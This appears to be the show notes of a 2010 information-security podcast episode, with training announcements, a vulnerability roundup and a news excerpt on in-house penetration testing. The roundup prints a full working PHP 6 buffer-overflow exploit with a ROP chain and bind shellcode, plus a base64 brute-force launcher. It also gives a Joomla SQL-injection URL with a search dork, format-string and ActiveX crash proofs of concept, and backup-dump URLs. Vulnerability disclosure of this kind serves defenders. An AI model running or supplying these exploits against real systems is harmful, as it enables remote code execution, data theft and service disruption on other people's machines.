ISD Podcast Episode 115 for April 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
MyHardDriveDied.com:
- MHDD Data Recovery Class current dates and locations:
- San Diego – May 10th-14th
- San Francisco – June 14th -18th
- Atlanta – July – 12th-16th
- Chicago – September – 13th – 17th
- Dallas, TX – October – 11th – 15th
- Washington DC – December 6th – 10th
- Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com
SANS Community Atlanta:
- SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)
SANS Mentoring Program:
- Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)
Atlanta ISSA:
- Atlanta Secureworld Expo April 27 – 28, 2010 Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
- ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University. The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training [at] gaissa [dot] org.
- ISSA International Conference – September 16, 2010 (http://www.issa.org/page/?p=105)
Kentuckiana ISSA:
- 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)
Friends of the Podcast: Webhosting services:WebSpeedway
Vulnerabilities of Interest:
- Mp3 MuZik is subject to a Data Base Download vulnerability. Proof of Concept URLs are available: http://www.sample.com/Mp3/dbaze/ http://www.sample.com/Mp3/admin
- Games Script (Galore) is subject to a Backup Dump vulnerability. Proof of Concept URLs are available: http://www.sample.com/Games Script (Galore)/admincp/backup/ http://www.sample.com/Games Script (Galore)/admincp/
- My School Script is subject to a Backup Dump vulnerability. Proof of Concept URLs are available: http://www.sample.com/My.School/odevsitesi.mdb http://www.sample.com/My.School/sayac.mdb http://www.sample.com/My.School/admin.asp
- PHP 6.0 Dev str_transliterate() is subject to a Buffer Overflow vulnerability. Proof of Concept code is available: <?php /* 04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit Tested on Windows 2008 SP1 DEP alwayson Matteo Memelli aka ryujin ( AT ) offsec.com original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n) Thx to muts and Elwood for helping
Bruteforce script is attached in base64 format. root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8 (*) Php6 str_transliterate() bof || ryujin # offsec.com (*) Bruteforcing WPM ret address… (+) Trying base address 0×78000000 (+) Trying base address 0×77000000 (+) Trying base address 0×76000000 (+) Trying base address 0×75000000 Microsoft Windows [Version 6.0.6001] Copyright (c) 2006 Microsoft Corporation. All rights reserved. C:\wamp\bin\apache\Apache2.2.11>whoami whoami nt authority\system */ error_reporting(0); $base_s = $_GET['pos_s']; $base_e = $_GET['pos_e']; $off_s = $_GET['off_s']; $off_e = $_GET['off_e']; if(ini_get_bool('unicode.semantics')) { $buff = str_repeat("\u4141", 32); $tbp = "\u2650\u6EE5"; // 6EE52650 ADDRESS TO BE PATCHED BY WPM $ptw = "\u2FE0\u6EE5"; // 6EE52FE0 POINTER FOR WRITTEN BYTES $ret = "\u2660\u6EE5"; // 6EE52660 RET AFTER WPM $wpmargs = $ret."\uFFFF\uFFFF".$tbp."\uFFFF\uFFFF\uFFFF\uFFFF".$ptw; // WPM ARGS $garbage = "\$wpm = \"\\u".strtoupper(sprintf("%02s", dechex($off_s))).strtoupper(sprintf("%02s", dechex($off_e))). "\\u".strtoupper(sprintf("%02s", dechex($base_s))).strtoupper(sprintf("%02s", dechex($base_e)))."\";"; eval($garbage); $nops = str_repeat("\u9090", 41); // TH || ROP -> Try Harder or Rest On Pain // GETTING SHELLCODE ABSOLUTE ADDRESS $rop = "\u40dd\u6FF2"; // MOV EAX,EBP/POP ESI/POP EBP/POP EBX/RETN 6FF240DD $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4 $rop .= "\uFDBC\uFFFF"; // VALUE TO BE POPPED IN ECX (REL. OFFSET TO SHELLCODE) FFFFFDBC $rop .= "\u222B\u6EED"; // ADD EAX,ECX/POP EBX/POP EBP/RETN 6EED222B $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE) $rop .= "\u2650\u6EE5"; // JUNK POPPED IN EBP (RET TO SHELLCODE) // PATCHING BUFFER ADDY ARG FOR WPM $rop .= "\u1C13\u6EE6"; // ADD DWORD PTR DS:[EAX],EAX/RETN 6EE61C13 // GETTING NUM BYTES IN REGISTER 0x1A0 (LEN OF SHELLCODE) $rop .= "\uE94E\u6EE6"; // MOV EDX,ECX/POP EBP/RETN 6EE6E94E $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u5DD4\u6EE6"; // POP ECX/RETN 6EE65DD4 $rop .= "\uFF5C\uFFFF"; // VALUE TO BE POPPED IN ECX FFFFFF5C $rop .= "\uE94C\u6EE6"; // SUB ECX,EDX/MOV EDX,ECX/POP EBP/RETN 6EE6E94C $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP // PATCHING NUM BYTES TO BE COPIED ARG FOR WPM $rop .= "\u0C54\u6EE7"; // MOV DWORD PTR DS:[EAX+4],ECX/POP EBP/RETN 6EE70C54 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP // REALIGNING ESP TO WPM AND RETURNING TO IT $rop .= "\u8640\u6EE6"; // ADD EAX,-30/POP EBP/RETN 6EE68640 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u29F1\u6EE6"; // ADD EAX,0C/POP EBP/RETN 6EE629F1 $rop .= "\u4242\u4242"; // JUNK POPPED IN EBP $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u10AD\u6FC3"; // INC EAX/RETN 6FC310AD $rop .= "\u2C63\u6FC5"; // XCHG EAX,ESP/RETN 6FC52C63 // unicode bind shellcode port 4444, 318 bytes $sh = "\u6afc\u4deb\uf9e8\uffff\u60ff\u6c8b\u2424\u458b\u8b3c\u057c\u0178\u8bef\u184f\u5f8b". "\u0120\u49eb\u348b\u018b\u31ee\u99c0\u84ac\u74c0\uc107\u0dca\uc201\uf4eb\u543b\u2824". "\ue575\u5f8b\u0124\u66eb\u0c8b\u8b4b\u1c5f\ueb01\u2c03\u898b\u246c\u611c\u31c3\u64db". "\u438b\u8b30\u0c40\u708b\uad1c\u408b\u5e08\u8e68\u0e4e\u50ec\ud6ff\u5366\u6866\u3233". "\u7768\u3273\u545f\ud0ff\ucb68\ufced\u503b\ud6ff\u895f\u66e5\ued81\u0208\u6a55\uff02". "\u68d0\u09d9\uadf5\uff57\u53d6\u5353\u5353\u5343\u5343\ud0ff\u6866\u5c11\u5366\ue189". "\u6895\u1aa4\uc770\uff57\u6ad6\u5110\uff55\u68d0\uada4\ue92e\uff57\u53d6\uff55\u68d0". "\u49e5\u4986\uff57\u50d6\u5454\uff55\u93d0\ue768\uc679\u5779\ud6ff\uff55\u66d0\u646a". "\u6866\u6d63\ue589\u506a\u2959\u89cc\u6ae7\u8944\u31e2\uf3c0\ufeaa\u2d42\u42fe\u932c". "\u7a8d\uab38\uabab\u7268\ub3fe\uff16\u4475\ud6ff\u575b\u5152\u5151\u016a\u5151\u5155". "\ud0ff\uad68\u05d9\u53ce\ud6ff\uff6a\u37ff\ud0ff\u578b\u83fc\u64c4\ud6ff\uff52\u68d0". "\uceef\u60e0\uff53\uffd6\ud0d0\u4142\u4344\u4142\u4344\u4142\u4344\u4142\u4344"; $exploit = $buff.$ret.$wpm.$wpmargs.$nops.$sh.$rop; str_transliterate(0, $exploit, 0); } else { exit("Error! 'unicode.semantics' has be on!\r\n"); } function ini_get_bool($a) { $b = ini_get($a); switch (strtolower($b)) { case 'on': case 'yes': case 'true': return 'assert.active' !== $a; case 'stdout': case 'stderr': return 'display_errors' === $a; default: return (bool) (int) $b; } } /* IyEvdXNyL2Jpbi9weXRob24KaW1wb3J0IHN5cywgcmFuZG9tLCBvcywgdGltZSwgdXJsbGliCmlt cG9ydCBzb2NrZXQgCgp0YXJnZXRzID0geyd3aW4yazgnOiBbMHgxQywgMHhDNl0sIH0KdGltZW91 dCA9IDAuMQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQodGltZW91dCkKCnRyeToKICAgaG9zdCAg ICAgPSBzeXMuYXJndlsxXQogICBwYXRoICAgICA9IHN5cy5hcmd2WzJdCiAgIHRhcmdldCAgID0g c3lzLmFyZ3ZbM10KZXhjZXB0IEluZGV4RXJyb3I6CiAgIHByaW50ICJVc2FnZTogJXMgaG9zdCBw YXRoIHRhcmdldCIgJSBzeXMuYXJndlswXQogICBwcmludCAiRXhhbXBsZTogJXMgMTcyLjE2LjMw LjI0OSAvIHdpbjJrOCIgJSBzeXMuYXJndlswXQogICBwcmludCAiU3VwcG9ydGVkIHRhcmdldHM6 IFdpbmRvd3MgMjAwOCBTUDE6IHdpbjJrOCIKICAgc3lzLmV4aXQoKQoKaWYgdGFyZ2V0IG5vdCBp biB0YXJnZXRzOgogICBwcmludCAiVGFyZ2V0IG5vdCBzdXBwb3J0ZWQhIgogICBzeXMuZXhpdCgp CmVsc2U6CiAgIHRhcmdldF9hX3MsIHRhcmdldF9hX2UgPSB0YXJnZXRzW3RhcmdldF1bMF0sIHRh cmdldHNbdGFyZ2V0XVsxXQoKZGVmIHNlbmRSZXF1ZXN0KGksayk6CiAgIHBhcmFtcyA9IHVybGxp Yi51cmxlbmNvZGUoeydwb3NfZSc6IGksICdwb3Nfcyc6IGssICdvZmZfcyc6IHRhcmdldF9hX3Ms IAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnb2ZmX2UnOiB0YXJnZXRfYV9lLCAncm5k Jzogc3RyKGludChyYW5kb20ucmFuZG9tKCkpKSx9KQogICB0cnk6CiAgICAgIGYgPSB1cmxsaWIu dXJsb3BlbigiaHR0cDovLyVzJXM/JXMiICUgKGhvc3QsIHBhdGgsIHBhcmFtcykpCiAgICAgIHBy aW50IGYucmVhZCgpCiAgIGV4Y2VwdCBJT0Vycm9yOgogICAgICBwYXNzCgppZiBfX25hbWVfXyA9 PSAnX19tYWluX18nOgogICBwcmludCAiKCopIFBocDYgc3RyX3RyYW5zbGl0ZXJhdGUoKSBib2Yg fHwgcnl1amluICMgb2Zmc2VjLmNvbSIKICAgcHJpbnQgIigqKSBCcnV0ZWZvcmNpbmcgV3JpdGVQ cm9jZXNzTWVtb3J5IHJldCBhZGRyZXNzLi4uIgogICBiID0gcmFuZ2UoMTEyLDEyMSkKICAgYi5y ZXZlcnNlKCkKICAgZm9yIGsgaW4gYjoKICAgICAgcHJpbnQgIigrKSBUcnlpbmcgYmFzZSBhZGRy ZXNzIDB4JXgwMDAwMDAiICUgayAKICAgICAgZm9yIGkgaW4gcmFuZ2UoMSwyNTYpOgogICAgICAg ICBzZW5kUmVxdWVzdChpLGspCiAgICAgICAgIGlmIG9zLnN5c3RlbSgibmMgLXZuICVzIDQ0NDQg Mj4vZGV2L251bGwiICUgaG9zdCkgPT0gMDoKICAgICAgICAgICAgYnJlYWsKICAgICAgICAgdGlt ZS5zbGVlcCgwLjA1KSAK */ ?> - Joomla Component QPersonel is subject to a SQL Injection vulnerability. Version older than 1.02 are impacted, though others may be as well. Google Dork "inurl:option=com_qpersonel". Example URL is available: http://www.sample.com/index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(database(),user())–
- VMware Remote Console is subject to a format string vulnerability. Version 4.0 impacted, though others may be as well. Example code is available: Create a shortcut: C:\Program Files\Common Files\VMware\VMware Remote Console Plug-in>vmware-vmrc.exe -u vmware_user -h HOST -M AAAA:%x.%x.%x.%x.:BBBB VMDlg::ShowDialog: Error opening the remote virtual machine HOST\AAAA:3455600.78138a94.100012b2.28e27b0.:BBBB: Example(ActiveX): objectVMRC.connect ("host" ,"username" ,"password", "%x:%x:%x:%x:%x:%x:%x:%x:%x" ,"X" ,2);
- Magneto Software ActiveX Control is subject to a ICMP Crash Denial of Service vulnerability. Example code is available: <html> <object classid='clsid:B5ED1577-4576-11D5-851F-00D0B7A934F6' id='target' /></object> <script language='vbscript'> 'Magneto Software ActiveX Control ICMP Crash POC 'Discovered by: s4squatch 'Site: www.securestate.com 'Date Discovered: 02/11/10 'Vendor Notified: 02/02/10 –> NO RESPONSE 'Vendor Notified: 02/11/10 –> NO RESPONSE 'Vendor Notified: 02/17/10 –> NO RESPONSE 'Published 04/13/10 'www: http://www.magnetosoft.com/products/skdns/skdns_features.htm 'Download: http://www.magnetosoft.com/downloads/skdns_setup.exe 'SKNetResource.ocx 'Function DNSLookupHostWithServer ( ByVal strHostName As String , ByVal strNameServer As String ) As Long 'progid = "SKDNSLib.SKDns" arg1 = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n" arg2 = "defaultV" target.DNSLookupHostWithServer arg1 ,arg2 </script>
Stories of Interest:
News item 1: http://www.darkreading.com/vulnerability_management/security/management/showArticle.jhtml?articleID=224400589
Conducting penetration testing in-house rather than using an outside consultant is worth considering for reasons of both cost and security expertise — but it's also a step not to be taken lightly."The advantage of having in-house penetration testers is the focus they provide," says Chris Nickerson, founder of security firm Lares Consulting. "They're able to keep track of the latest exploits and vulnerabilities, constantly monitor systems, and practice and sharpen their skills. But in order to achieve those benefits, they have to be focused. "Nickerson points out that while some really large enterprises are fielding teams wholly dedicated to testing, for most companies pen tests are only part of the testers' responsibilities. "It's all too common to find penetration tests delayed or put off because the tester has too many other open tickets to deal with," he says.While even a part-time pen-test specialist on staff can be a step in the right direction, it can also be risky. "The variety of tools available for pen tests today is remarkable, and I pretty much applaud them all," he says. "Metasploit, Canvas, Core, Nessus, and others have spent a lot of time ensuring that installing their agents don't blow the boxes that are being tested. That's the default: Once the agent is installed and it's determined whether or not the exploit works, the agent is uninstalled."
